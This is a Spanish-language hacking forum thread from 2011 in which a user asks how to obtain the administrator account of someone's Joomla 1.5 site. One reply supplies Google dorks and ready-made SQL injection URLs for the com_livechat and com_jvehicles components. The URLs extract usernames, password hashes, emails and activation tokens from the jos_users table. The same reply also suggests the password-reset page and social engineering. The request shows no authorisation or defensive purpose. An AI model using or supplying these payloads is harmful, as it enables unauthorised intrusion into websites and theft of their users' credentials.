Sólo texto | Texto con Imágenes

Underc0de - La Casa de los Informáticos

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: WhitePag en Agosto 10, 2011, 02:20:29 AM

Título: [SOLUCIONADO] Ayuda , Sacar admin de Joomla 1.5
Publicado por: WhitePag en Agosto 10, 2011, 02:20:29 AM
Buenas , tengo una duda , como puedo hacer para sacar el admin de una pagina que tiene joomla 1.5? mediante sql o como?
si me pueden dejar un link o tuto mucho mejor
Muchas Gracias!
Título: Re:Ayuda , Sacar admin de Joomla 1.5
Publicado por: RandomSoft en Agosto 10, 2011, 10:07:22 AM
 ??? La manera más facil es que se lo pidas al Administrador  ::) al menos que te tomes el tiempo de buscar en San Google o en el Foro algunos Manuales o VideoTutoriales, te recomiendo buscar los VideoTutoriales de Xt3mP.
Título: Re:Ayuda , Sacar admin de Joomla 1.5
Publicado por: Fakedo0r en Agosto 10, 2011, 01:00:42 PM
Primero aprende a usar el Google. Como dice el RandomSoft, hay muchos tutoriales sobre el tema, tan solo buscalos.

Título: Re:Ayuda , Sacar admin de Joomla 1.5
Publicado por: Harakiri en Agosto 11, 2011, 06:57:49 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
depende men que bug tenga mira aqui te doy algo que te ayudaria

Código [Seleccionar]
Dork: allinurl:index.php?option=com_livechat

Exploit: /administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex%28hex%28concat%28username,0x3a,password%29%29%29,3%20from%20jos_users

Dork: allinurl:index.php?option=com_livechat

Exploit: /index.php?option=com_user&view=reset&layout=confirm



--------------------------------------------------------------------

Dorks : inurl:option=com_jvehicles inurl:com_jvehicles

######### Exploit nr 1 ############

index.php?option=com_jvehicles&task=agentlisting&aid=62 /**/ AND /**/ 1=0 /**/ UNION /**/ ALL /**/ SELECT /**/ 1, /**/ 2, /**/ version(), /**/ 4, /**/ group_concat(username,0x3a,email), /**/ 6, /**/ 7, /**/ 8, /**/ 9, /**/ 10, /**/ 11, /**/ 12, /**/ 13, /**/ 14, /**/ 15, /**/ 16, /**/ 17, /**/ 18, /**/ 19, /**/ 20, /**/ 21, /**/ 22, /**/ 23, /**/ 24, /**/ 25, /**/ 26, /**/ 27, /**/ 28, /**/ 29, /**/ 30, /**/ 31, /**/ 32 from+jos_users--

######## Exploit Nr 2 ############

index.php?option=com_jvehicles&task=agentlisting&aid=62 /**/ AND /**/ 1=0 /**/ UNION /**/ ALL /**/ SELECT /**/ 1, /**/ 2, /**/ version(), /**/ 4, /**/ group_concat(username,0x3a,activation), /**/ 6, /**/ 7, /**/ 8, /**/ 9, /**/ 10, /**/ 11, /**/ 12, /**/ 13, /**/ 14, /**/ 15, /**/ 16, /**/ 17, /**/ 18, /**/ 19, /**/ 20, /**/ 21, /**/ 22, /**/ 23, /**/ 24, /**/ 25, /**/ 26, /**/ 27, /**/ 28, /**/ 29, /**/ 30, /**/ 31, /**/ 32 from+jos_users--


/index.php?option=com_user&view=reset

No creo que le sirvan porque los dos estan basados en componentes especificos (com_livechat, com_jvehicles) y no en vulnerabilidades nativas (que son muy escazas por no decir cada ves mas imposibles de encontrar)

De todas maneras si es buena idea que busques los componentes instalados y trates inyecciones varias y tal... si no quizas puedas sacar el adm con ingenieria social.

=) saludos
Sólo texto | Texto con Imágenes